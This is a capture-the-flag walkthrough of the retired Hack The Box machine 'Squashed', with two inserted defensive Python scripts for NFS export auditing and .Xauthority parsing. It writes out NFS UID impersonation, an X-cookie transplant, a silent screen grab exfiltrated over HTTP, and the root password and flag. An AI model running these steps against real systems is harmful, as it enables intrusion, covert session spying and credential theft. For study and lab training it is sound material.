Squashed

Name: Squashed
Release Date: 10 Nov 2022
Retire Date: 12 Mar 2023
OS: Linux
Base Points: Easy - Retired [0]
Rated Difficulty:
HTB-Bot 00 days, 01 hours, 59 mins, 50 seconds
Creator: polarbearer
Pentest Workshop PDF: Squashed.pdf

As always, we start with AutoRecon and upload the XML outputs to Pentest.WS.

The main ports to worry about here are 111 and 2049 (both NFS-related ports). The website is active, but NFS is really all you need to start. Use:

┌──(cruggieri㉿kali-purple)-[~/Desktop]
└─$ showmount -e squashed.htb
Export list for squashed.htb:
/home/ross    *
/var/www/html *

Then you can create 2 directories in the mnt folder and mount the 2 NFS shares available.

┌──(cruggieri㉿kali-purple)-[~/Desktop]
└─$ sudo mkdir /mnt/1
                                                                                         
┌──(cruggieri㉿kali-purple)-[~/Desktop]
└─$ sudo mkdir /mnt/2
                                                                                          
┌──(cruggieri㉿kali-purple)-[~/Desktop]
└─$ sudo mount -t nfs squashed.htb:/var/www/html /mnt/1
                                                                                          
┌──(cruggieri㉿kali-purple)-[~/Desktop]
└─$ sudo mount -t nfs squashed.htb:/home/ross /mnt/2

From here, we can try to list both mounts, but /mnt/1 throws permission denied errors:

┌──(root㉿kali-purple)-[/home/cruggieri/Desktop]
└─# ls -la /mnt/1
ls: cannot access '/mnt/1/.': Permission denied
ls: cannot access '/mnt/1/..': Permission denied
ls: cannot access '/mnt/1/.htaccess': Permission denied
ls: cannot access '/mnt/1/index.html': Permission denied
ls: cannot access '/mnt/1/images': Permission denied
ls: cannot access '/mnt/1/css': Permission denied
ls: cannot access '/mnt/1/js': Permission denied
total 0
d????????? ? ? ? ?            ? .
d????????? ? ? ? ?            ? ..
?????????? ? ? ? ?            ? css
?????????? ? ? ? ?            ? .htaccess
?????????? ? ? ? ?            ? images
?????????? ? ? ? ?            ? index.html
?????????? ? ? ? ?            ? js
                                                                                                                                                                                                                  
┌──(root㉿kali-purple)-[/home/cruggieri/Desktop]
└─# ls -la /mnt/2
total 68
drwxr-xr-x 14 1001 1001 4096 May 29 14:37 .
drwxr-xr-x  5 root root 4096 May 29 14:54 ..
lrwxrwxrwx  1 root root    9 Oct 20  2022 .bash_history -> /dev/null
drwx------ 11 1001 1001 4096 Oct 21  2022 .cache
drwx------ 12 1001 1001 4096 Oct 21  2022 .config
drwxr-xr-x  2 1001 1001 4096 Oct 21  2022 Desktop
drwxr-xr-x  2 1001 1001 4096 Oct 21  2022 Documents
drwxr-xr-x  2 1001 1001 4096 Oct 21  2022 Downloads
drwx------  3 1001 1001 4096 Oct 21  2022 .gnupg
drwx------  3 1001 1001 4096 Oct 21  2022 .local
drwxr-xr-x  2 1001 1001 4096 Oct 21  2022 Music
drwxr-xr-x  2 1001 1001 4096 Oct 21  2022 Pictures
drwxr-xr-x  2 1001 1001 4096 Oct 21  2022 Public
drwxr-xr-x  2 1001 1001 4096 Oct 21  2022 Templates
drwxr-xr-x  2 1001 1001 4096 Oct 21  2022 Videos
lrwxrwxrwx  1 root root    9 Oct 21  2022 .viminfo -> /dev/null
-rw-------  1 1001 1001   57 May 29 14:37 .Xauthority
-rw-------  1 1001 1001 2475 May 29 14:37 .xsession-errors
-rw-------  1 1001 1001 2475 Dec 27 09:33 .xsession-errors.old
                                                                                                                                                                                                                   
┌──(root㉿kali-purple)-[/home/cruggieri/Desktop]
└─# ls -ld /mnt/1
drwxr-xr-- 5 2017 www-data 4096 May 29 14:55 /mnt/1

The web root is owned by UID 2017, and NFS simply trusts whatever UID the client presents. So one thing we can do is create a local user, change it to that user ID (2017), and try again.

Create a new user and force it to the 2017 user ID:

┌──(root㉿kali-purple)-[/home/cruggieri/Desktop]
└─# useradd squashed
                                        
┌──(root㉿kali-purple)-[/home/cruggieri/Desktop]
└─# usermod -u 2017 squashed
                                                                                          
┌──(root㉿kali-purple)-[/home/cruggieri/Desktop]
└─# groupmod -g 2017 squashed          
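The UID trick above works because an NFS export with the default sec=sys (AUTH_SYS) accepts whatever UID the client sends, and root_squash only remaps UID 0. As an added example that is not part of the writeup, here is a small /etc/exports auditor that parses export lines and flags the settings that make this possible (wildcard hosts, no_root_squash, and exports that neither squash all UIDs nor require Kerberos); the sample exports file is constructed, since the box's real options are never shown.

```python
import re

# Constructed sample /etc/exports shaped like the two shares showmount listed above;
# the writeup never shows the box's real export options, so these values are made up.
SAMPLE_EXPORTS = """\
/var/www/html   *(rw,sync,root_squash)
/home/ross      *(rw,sync,no_root_squash)
/srv/backup     10.10.11.0/24(ro,sync,all_squash,anonuid=65534,anongid=65534)
"""

# One client spec: either "host(opt,opt)" or a bare host with default options.
CLIENT_RE = re.compile(r"(\S+?)\(([^)]*)\)|(\S+)")

def parse_exports(text):
    """Yield (path, client, options) for every client spec in an exports file."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        parts = line.split(None, 1)
        if len(parts) != 2:
            continue
        path, rest = parts
        for m in CLIENT_RE.finditer(rest):
            if m.group(3):
                yield path, m.group(3), frozenset()
            else:
                opts = frozenset(o.strip() for o in m.group(2).split(",") if o.strip())
                yield path, m.group(1), opts

def audit_exports(text):
    """Flag settings that let a client pick the UID it accesses the share with."""
    findings = []
    for path, client, opts in parse_exports(text):
        if client == "*":
            findings.append((path, client, "wildcard_host"))
        if "no_root_squash" in opts:
            findings.append((path, client, "no_root_squash"))
        # root_squash only remaps UID 0. Under the default sec=sys every other UID the
        # client presents is honoured, which is exactly why a local user with UID 2017
        # could read the web root. all_squash or Kerberos (sec=krb5*) closes that gap.
        if "all_squash" not in opts and not any(o.startswith("sec=krb5") for o in opts):
            findings.append((path, client, "uid_passthrough"))
    return findings

if __name__ == "__main__":
    for path, client, tag in audit_exports(SAMPLE_EXPORTS):
        print(f"{path} {client}: {tag}")
```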

Now we can clone PentestMonkey's PHP reverse shell script, edit it with our IP, and have the server call back to us.

Now, if we repeat that user process but with the 1001 user ID from /mnt/2 (/home/ross), we should be able to actually see what's in Ross's folder. One thing that popped out is .Xauthority! That's an easy screen grab for us, if we can mirror the session.

Bingo!!! We have a Magic Cookie that will let us impersonate the X session, mirror it, and do a silent screen grab! We can do this by base64-encoding the .Xauthority file, pasting the blob into Alex's shell on the target, decoding it back to a file there, and exporting XAUTHORITY to point at it. Here's the command list:

squash2@kali-purple:/mnt/2$ cat ./.Xauthority
squashed.htb0MIT-MAGIC-COOKIE-1�����Q0q�j�cŒ

squash2@kali-purple:/mnt/2$ cat ./.Xauthority | base64
AQAADHNxdWFzaGVkLmh0YgABMAASTUlULU1BR0lDLUNPT0tJRS0xABDwgBbB8bxRAzBxj2qIY8WS

Then, from the victim machine (Alex's terminal), run:

alex@squashed:/home/alex$ echo 'AQAADHNxdWFzaGVkLmh0YgABMAASTUlULU1BR0lDLUNPT0tJRS0xABDwgBbB8bxRAzBxj2qIY8WS' | base64 -d > /tmp/.Xauthority
alex@squashed:/home/alex$ export XAUTHORITY=/tmp/.Xauthority
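As an added example that is not part of the writeup, here is a small parser for the .Xauthority format as libXau writes it: each entry is a 16-bit big-endian family code followed by four length-prefixed fields (address, display number, auth protocol name, auth data). Run over the base64 blob above, it shows exactly what the leaked file grants (a Local-family entry for host squashed.htb, display :0, with a 16-byte MIT-MAGIC-COOKIE-1 key), which is the scoping check an incident responder would do for a readable .Xauthority; the summary lines deliberately leave the key itself out.

```python
import base64
import struct

# The cookie file exactly as the writeup printed it above (base64 of ross's .Xauthority
# on this retired lab box), reused here as the sample input.
XAUTH_B64 = "AQAADHNxdWFzaGVkLmh0YgABMAASTUlULU1BR0lDLUNPT0tJRS0xABDwgBbB8bxRAzBxj2qIY8WS"
# Family codes from libXau's Xauth.h.
FAMILIES = {0: "Internet", 6: "InternetV6", 252: "LocalHost", 256: "Local", 65535: "Wild"}

def _u16(buf, pos):
    """Big-endian 16-bit count at pos; every field in the file is prefixed by one."""
    if pos + 2 > len(buf):
        raise ValueError("truncated .Xauthority entry")
    return struct.unpack_from(">H", buf, pos)[0], pos + 2

def _counted(buf, pos):
    """Read a length prefix, then that many bytes."""
    n, pos = _u16(buf, pos)
    if pos + n > len(buf):
        raise ValueError("truncated .Xauthority entry")
    return buf[pos:pos + n], pos + n

def parse_xauthority(data):
    """Return one dict per entry: family, address, display number, auth name, key."""
    entries, pos = [], 0
    while pos < len(data):
        family, pos = _u16(data, pos)
        address, pos = _counted(data, pos)
        number, pos = _counted(data, pos)
        name, pos = _counted(data, pos)
        key, pos = _counted(data, pos)
        entries.append({
            "family": FAMILIES.get(family, str(family)),
            "address": address.decode("latin-1"),
            "display": number.decode("ascii"),
            "name": name.decode("ascii"),
            "key_hex": key.hex(),
        })
    return entries

def parse_xauthority_b64(text):
    return parse_xauthority(base64.b64decode(text))

def summarize(entries):
    """One line per entry saying what the cookie unlocks; the key itself stays out of logs."""
    return [f"{e['family']} host={e['address']} display=:{e['display']} "
            f"{e['name']} ({len(e['key_hex']) // 2}-byte key)" for e in entries]

if __name__ == "__main__":
    print("\n".join(summarize(parse_xauthority_b64(XAUTH_B64))))
```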

That will get the Magic Cookie in place. If you look at the beginning of the reverse shell connection (PentestMonkey's shell runs w as soon as it connects), you should see:

 20:11:10 up 34 min,  1 user,  load average: 0.03, 0.03, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
ross     tty7     :0               19:37   33:56   4.79s  0.03s /usr/libexec/gnome-session-binary --systemd --session=gnome

If not, or if you don't remember it, you can use the w command to pull the session list up again:

alex@squashed:/home/alex$ w
 20:11:10 up 34 min,  1 user,  load average: 0.03, 0.03, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
ross     tty7     :0               19:37   33:56   4.79s  0.03s /usr/libexec/gnome-session-binary --systemd --session=gnome

So, this information is important for two reasons. First, it told me to LOOK at .Xauthority (or TightVNC/TigerVNC or something similar): ross has a live GNOME session on tty7, so there is a display to grab. Second, the FROM column tells us the display (:0) that we need to send this next command to.

alex@squashed:/home/alex$ xwd -root -screen -silent -display :0 > /tmp/screen.xwd

That command tells xwd to select the root window (-root), send a GetImage request to the root window (-screen), do so silently (-silent), and which X server to connect to (-display :0). See, told you that :0 FROM address would be needed. It then writes that image out as /tmp/screen.xwd.

From here, we need to get that screen grab to our machine, so we change to the /tmp directory and use:

From Target:

alex@squashed:/tmp$ python3 -m http.server 8992
Serving HTTP on 0.0.0.0 port 8992 (http://0.0.0.0:8992/) ...
10.10.16.8 - - [29/May/2023 20:16:43] "GET /screen.xwd HTTP/1.1" 200 -

And from the attacker:

┌──(cruggieri㉿kali-purple)-[~/Desktop/HTB/Squashed]
└─$ wget http://squashed.htb:8992/screen.xwd
--2023-05-29 15:16:43--  http://squashed.htb:8992/screen.xwd
Resolving squashed.htb (squashed.htb)... 10.10.11.191
Connecting to squashed.htb (squashed.htb)|10.10.11.191|:8992... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1923179 (1.8M) [image/x-xwindowdump]
Saving to: ‘screen.xwd’

screen.xwd                                           100%[=====================================================================================================================>]   1.83M   525KB/s    in 3.8s    

2023-05-29 15:16:47 (495 KB/s) - ‘screen.xwd’ saved [1923179/1923179]

Just like that, the screen grab is ours! But we can't view it yet: we need to convert it to PNG. Fortunately, that's as easy as running ImageMagick's convert:

┌──(cruggieri㉿kali-purple)-[~/Desktop/HTB/Squashed]
└─$ convert screen.xwd screen.png

In the screen grab, lookie here! We've got some "root" creds! We can try to SSH, but I did that and it failed. So, instead I used su root in the Alex terminal and BAM! Instant root!

su root
Password: cah$mei7rai9A

And there you have it!

root@squashed:/# cat /root/root.txt
cf468a9281c4779bf56fd01f3cf1372d

And with that, another box pwned.
